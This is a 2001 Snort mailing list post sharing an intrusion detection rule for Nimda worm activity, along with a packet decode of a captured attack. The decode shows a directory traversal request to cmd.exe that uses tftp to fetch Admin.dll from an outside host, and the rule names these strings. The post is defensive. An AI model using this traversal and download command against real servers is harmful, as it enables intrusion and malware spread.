Snort mailing list archives
Signature for NIMDA command
From: Steve Halligan <agent33 () geeksquad com>
Date: Wed, 19 Sep 2001 17:49:14 -0500
This is the signature to detect a nimda infected server telling a server that is has determined is vulnerable to use tftp to upload the admin.dll file. If you see this one trip you have been gotten. alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"Successful NIMDA TFTP activity"; flags:A+; uricontent:"cmd.exe?"; uricontent:"c+tftp -i"; nocase; classtype: successful-admin;) here is a packet decode of it that I based the rule on. -steve ---------------------------------------------------------------------------- -- #(2 - 25210) [2001-09-18 10:17:15] spp_unidecode: Unicode Directory Transversal attack detected IPv4: 65.29.243.180 -> 65.29.59.70 hlen=5 TOS=0 dlen=191 ID=44180 flags=0 offset=0 TTL=119 chksum=42351 TCP: port=3905 -> dport: 80 flags=***AP*** seq=461005741 ack=288345 off=5 res=0 win=8760 urp=0 chksum=246 Payload: length = 139 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 5c../winnt/syste 020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 74 m32/cmd.exe?/c+t 030 : 66 74 70 20 2D 69 20 36 35 2E 32 39 2E 32 34 33 ftp -i 65.29.243 040 : 2E 31 38 30 20 47 45 54 20 41 64 6D 69 6E 2E 64 .180 GET Admin.d 050 : 6C 6C 20 63 3A 5C 41 64 6D 69 6E 2E 64 6C 6C 20 ll c:\Admin.dll 060 : 3A 5C 41 64 6D 69 6E 2E 64 6C 6C 20 48 54 54 50 :\Admin.dll HTTP 070 : 2F 31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D /1.0..Host: www. 080 : 0A 43 6F 6E 6E 6E 65 63 74 69 6F .Connnectio _______________________________________________ Snort-users mailing list Snort-users () lists sourceforge net Go to this URL to change user options or unsubscribe: https://lists.sourceforge.net/lists/listinfo/snort-users Snort-users list archive: http://www.geocrawler.com/redir-sf.php3?list=snort-users
Current thread:
- Signature for NIMDA command Steve Halligan (Sep 19)